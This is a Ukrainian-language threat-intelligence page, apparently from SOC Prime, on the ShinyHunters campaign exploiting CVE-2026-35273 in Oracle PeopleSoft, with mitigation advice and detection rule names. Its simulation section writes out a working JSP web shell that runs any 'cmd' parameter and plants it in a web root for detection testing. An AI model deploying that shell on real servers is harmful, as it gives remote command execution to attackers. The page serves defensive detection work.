SOC Prime Bias: Critical

01 Oct 2026 07:53 UTC

ShinyHunters відновлює масштабні атаки, що націлені на Oracle PeopleSoft

Author Photo
SOC Prime Team linkedin icon Стежити
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Резюме

Зловмисник UNC6240 (ShinyHunters) відновив масштабну експлуатацію систем Oracle PeopleSoft через уразливість CVE-2026-35273. Кампанія використовує URL-кодовані шляхи для обходу веб-застосункових файрволів (WAF) і доступу до вразливої точки Environment Management Hub. Атакуючі розгортають декілька веб-оболонок разом з бекдором SIDEEYE для встановлення стійкості, підтримки несанкціонованого доступу та сприяння ексфільтрації даних.

Розслідування

Mandiant та Група загроз Google задокументували перехід від експлуатації нульового дня у червні 2026 року до атак N-дня проти непатчених середовищ. Дослідники виявили використання URL-кодування (/PSEMHUB/) для обходу фільтрації WAF на основі рядків. Аналіз виявив повторювану послідовність атак, що включає валідацію цілей через серіалізовані об’єкти Java, після чого слідує розгортання троянських інсталяторів і утиліт тунелювання.

Захист

Організаціям слід негайно встановити виправлення безпеки Oracle для усунення CVE-2026-35273 і відключити або видалити застосунок PSEMHUB. Конфігурації WAF повинні інспектувати та блокувати нормалізовані URL-шляхи замість покладання виключно на буквальне співставлення рядків. Команди безпеки повинні також обертати облікові дані доступу з веб-рівня та перевіряти каталоги застосунків на наявність підозрілих або несанкціонованих файлів.

Відповідь

Якщо виявлено веб-оболонку, захисники повинні вважати, що хост повністю скомпрометований, і зберегти судові докази перед виправленням. Увімкніть аудит на рівні хоста для виявлення неочікуваних процесів оболонки, запущених процесом WebLogic Java. Обертайте скомпрометовані облікові дані, включаючи рядки з’єднання бази даних і хмарні облікові дані, перевіряючи вихідну мережеву активність на відомі індикатори C2.

Потік атаки

Ми ще оновлюємо цю частину.

Детекції

Можливе перерахування системи (через cmdline)

Команда SOC Prime
29 вересня 2026

Підозріле управління командою по незвичайному домену верхнього рівня (TLD) DNS-запит (через dns)

Команда SOC Prime
29 вересня 2026

Можлива маніпуляція рядками з кодуванням Base64 (через cmdline)

Команда SOC Prime
29 вересня 2026

Віддалене завантаження / вивантаження файлів за допомогою стандартних інструментів (через cmdline)

Команда SOC Prime
29 вересня 2026

IOC (HashSha256) для виявлення: Масової експлуатаційної кампанії ShinyHunters, націленої на Oracle PeopleSoft

AI правила SOC Prime
29 вересня 2026

IOC (SourceIP) для виявлення: Масової експлуатаційної кампанії ShinyHunters, націленої на Oracle PeopleSoft

AI правила SOC Prime
29 вересня 2026

IOC (DestinationIP) для виявлення: Масової експлуатаційної кампанії ShinyHunters, націленої на Oracle PeopleSoft

AI правила SOC Prime
29 вересня 2026

Розгортання веб-оболонки через експлуатацію CVE-2026-35273 [Створення процесу Windows]

AI правила SOC Prime
29 вересня 2026

Експлуатація UNC6240 Oracle PeopleSoft з використанням веб-оболонок [веб-сервер]

AI правила SOC Prime
29 вересня 2026

Виконання симуляції

  • Розповідь про атаку та команди: Опонент ідентифікує екземпляр Oracle PeopleSoft і намагається використати уразливість. Щоб обійти прості сигнатури WAF, що шукають рядок “PSEMHUB”, атакуючий використовує кодування URL для запиту /PSEMHUB/. Після успішної експлуатації, атакуючий розгортає веб-оболонку з назвою x.jsp в корені веб-сайту для забезпечення стійкого інтерфейсу для виконання команд. Ця послідовність імітує конкретні індикатори компрометації (IOC), виявлені в кампанії експлуатації UNC6240.

  • Скрипт регресійного тестування:

    #!/bin/bash
    # Симуляційний скрипт для виявлення веб-оболонок UNC6240
    
    # 1. Визначення шляхів (відрегулюйте відповідно до цільового середовища)
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    TARGET_URL="http://localhost/PSEMHUB/"
    
    echo "[+] Створення симульованої веб-оболонки: $WEB_ROOT/$SHELL_NAME"
    # Створення простого вмісту JSP веб-оболонки
    echo '<% out.print(new java.util.Scanner(Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream()).useDelimiter("A").next()); %>' | sudo tee $WEB_ROOT/$SHELL_NAME > /dev/null
    
    echo "[+] Виклик виявлення через URL-кодований запит..."
    # Використовуйте curl для запиту до закодованого шляху, щоб створити запис у журналі
    curl -s "$TARGET_URL" > /dev/null
    
    echo "[+] Симуляція завершена. Перевірте SIEM для виявлення."
  • Команди очищення:

    #!/bin/bash
    # Скрипт очищення
    
    WEB_ROOT="/var/www/html"
    SHELL_NAME="x.jsp"
    
    echo "[+] Очищення симуляційних файлів..."
    sudo rm -f $WEB_ROOT/$SHELL_NAME
    echo "[+] Очищення завершено."